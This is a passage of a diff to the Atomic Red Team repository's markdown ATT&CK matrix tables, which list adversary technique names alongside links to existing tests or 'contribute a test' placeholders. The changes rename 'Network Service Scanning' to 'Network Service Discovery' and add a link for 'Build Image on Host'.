TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
|
||||
| | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
@@ -30,12 +30,12 @@
|
||||
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Scanning](../../T1046/T1046.md) | | | | [Non-Standard Port](../../T1571/T1571.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | [Non-Standard Port](../../T1571/T1571.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Keychain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
|
||||
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
|
||||
@@ -40,7 +40,7 @@
|
||||
| | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Cloud Service Discovery](../../T1526/T1526.md) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | [Inter-Process Communication](../../T1559/T1559.md) | Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Remote System Discovery](../../T1018/T1018.md) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Network Service Scanning](../../T1046/T1046.md) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
|
||||
| | Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Network Service Discovery](../../T1046/T1046.md) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
|
||||
| | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Software Discovery](../../T1518/T1518.md) | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
|
||||
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | [Steal Application Access Token](../../T1528/T1528.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
@@ -112,7 +112,7 @@
|
||||
| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | Build Image on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | [Build Image on Host](../../T1612/T1612.md) | | | | | | | |
|
||||
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [IIS Components](../../T1505.004/T1505.004.md) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
|
||||
@@ -34,7 +34,7 @@
|
||||
| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | [Encrypted Channel](../../T1573/T1573.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
|
||||
| | Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Indirect Command Execution](../../T1202/T1202.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [Network Service Scanning](../../T1046/T1046.md) | | | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
|
||||
| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Indirect Command Execution](../../T1202/T1202.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [Network Service Discovery](../../T1046/T1046.md) | | | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
|
||||
